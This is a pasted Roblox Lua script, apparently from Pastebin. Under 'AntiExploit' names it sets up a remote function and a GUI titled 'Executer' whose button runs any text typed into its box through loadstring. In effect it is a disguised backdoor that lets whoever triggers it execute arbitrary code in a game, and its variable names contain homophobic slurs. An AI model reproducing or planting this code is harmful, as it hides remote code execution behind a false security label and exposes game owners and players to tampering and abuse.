Advertisement
LordEzz7

Untitled

Sep 1st, 2018
101
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 3.67 KB | None | 0 0
  1. function popGui() -- obfuscated ok
  2.     spawn(function()
  3.         local yourmomgay = Instance.new("Folder", game:GetService("ReplicatedStorage"))
  4.         yourmomgay.Name = "AntiExploit_Mem"
  5.         local gaymote = Instance.new("RemoteFunction", yourmomgay)
  6.         gaymote.Name = "CheckData"
  7.         print("Loaded AntiExploit Data!")
  8.         gaymote.OnServerInvoke = function()
  9.             print("Loaded Data!")
  10.             -- Script
  11.                 -- Objects
  12.  
  13. local AntiExploit = Instance.new("ScreenGui")
  14. local Main_Frame = Instance.new("Frame")
  15. local TitleFrame = Instance.new("Frame")
  16. local Title = Instance.new("TextLabel")
  17. local Credits = Instance.new("TextLabel")
  18. local ExecutionButton = Instance.new("TextButton")
  19. local ExecutionScrolFrame = Instance.new("ScrollingFrame")
  20. local ExecutionBox = Instance.new("TextBox")
  21. Main_Frame.Draggable = true
  22. -- Properties
  23.  
  24. AntiExploit.Name = "AntiExploit"
  25. AntiExploit.Parent = game:GetService("Players")[_G.PLRNAME].PlayerGui
  26.  
  27. Main_Frame.Name = "Main_Frame"
  28. Main_Frame.Parent = AntiExploit
  29. Main_Frame.Active = true
  30. Main_Frame.BackgroundColor3 = Color3.new(1, 1, 1)
  31. Main_Frame.BackgroundTransparency = 0.5
  32. Main_Frame.BorderSizePixel = 6
  33. Main_Frame.Position = UDim2.new(0.354350567, 0, 0.176923081, 0)
  34. Main_Frame.Size = UDim2.new(0, 322, 0, 300)
  35.  
  36. TitleFrame.Name = "TitleFrame"
  37. TitleFrame.Parent = Main_Frame
  38. TitleFrame.BackgroundColor3 = Color3.new(0, 0, 0)
  39. TitleFrame.BackgroundTransparency = 0.30000001192093
  40. TitleFrame.BorderSizePixel = 4
  41. TitleFrame.Size = UDim2.new(0, 322, 0, 68)
  42.  
  43. Title.Name = "Title"
  44. Title.Parent = TitleFrame
  45. Title.BackgroundColor3 = Color3.new(1, 1, 1)
  46. Title.BackgroundTransparency = 1
  47. Title.Size = UDim2.new(0, 322, 0, 50)
  48. Title.Text = "Executer"
  49. Title.TextColor3 = Color3.new(1, 1, 1)
  50. Title.TextScaled = true
  51. Title.TextSize = 14
  52. Title.TextWrapped = true
  53.  
  54. Credits.Name = "Credits"
  55. Credits.Parent = TitleFrame
  56. Credits.BackgroundColor3 = Color3.new(1, 1, 1)
  57. Credits.BackgroundTransparency = 1
  58. Credits.Position = UDim2.new(0.0993788838, 0, 0.470588177, 0)
  59. Credits.Size = UDim2.new(0, 258, 0, 36)
  60. Credits.Font = Enum.Font.Cartoon
  61. Credits.Text = "Ezz"
  62. Credits.TextColor3 = Color3.new(1, 1, 1)
  63. Credits.TextScaled = true
  64. Credits.TextSize = 14
  65. Credits.TextWrapped = true
  66.  
  67. ExecutionButton.Name = "ExecutionButton"
  68. ExecutionButton.Parent = Main_Frame
  69. ExecutionButton.BackgroundColor3 = Color3.new(1, 1, 1)
  70. ExecutionButton.BorderSizePixel = 3
  71. ExecutionButton.Position = UDim2.new(0.0186335407, 0, 0.873333335, 0)
  72. ExecutionButton.Size = UDim2.new(0, 309, 0, 30)
  73. ExecutionButton.Font = Enum.Font.Cartoon
  74. ExecutionButton.Text = "Execute"
  75. ExecutionButton.TextColor3 = Color3.new(0, 0, 0)
  76. ExecutionButton.TextScaled = true
  77. ExecutionButton.TextSize = 14
  78. ExecutionButton.TextWrapped = true
  79.  
  80.  
  81. ExecutionScrolFrame.Name = "ExecutionScrolFrame"
  82. ExecutionScrolFrame.Parent = Main_Frame
  83. ExecutionScrolFrame.Active = true
  84. ExecutionScrolFrame.BackgroundColor3 = Color3.new(1, 1, 1)
  85. ExecutionScrolFrame.BorderSizePixel = 3
  86. ExecutionScrolFrame.Position = UDim2.new(0.0186335407, 0, 0.263333321, 0)
  87. ExecutionScrolFrame.Size = UDim2.new(0, 309, 0, 170)
  88.  
  89. ExecutionBox.Name = "ExecutionBox"
  90. ExecutionBox.Parent = ExecutionScrolFrame
  91. ExecutionBox.BackgroundColor3 = Color3.new(1, 1, 1)
  92. ExecutionBox.BorderSizePixel = 0
  93. ExecutionBox.Size = UDim2.new(0, 284, 0, 170)
  94. ExecutionBox.Font = Enum.Font.Cartoon
  95. ExecutionBox.MultiLine = true
  96. ExecutionBox.Text = "-- Made By: [S.E.A.L] DevTeam!"
  97. ExecutionBox.TextColor3 = Color3.new(0, 0, 0)
  98. ExecutionBox.TextSize = 14
  99.  
  100. ExecutionButton.MouseButton1Click:Connect(function()
  101.     loadstring(ExecutionBox.Text)()
  102. end)--easier to update.
  103.  
  104.             -- Script
  105.         end
  106.     end)
  107. end
  108.  
  109.  
  110. game:GetService("Players").PlayerAdded:Connect(function()
  111.     popGui()
  112. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement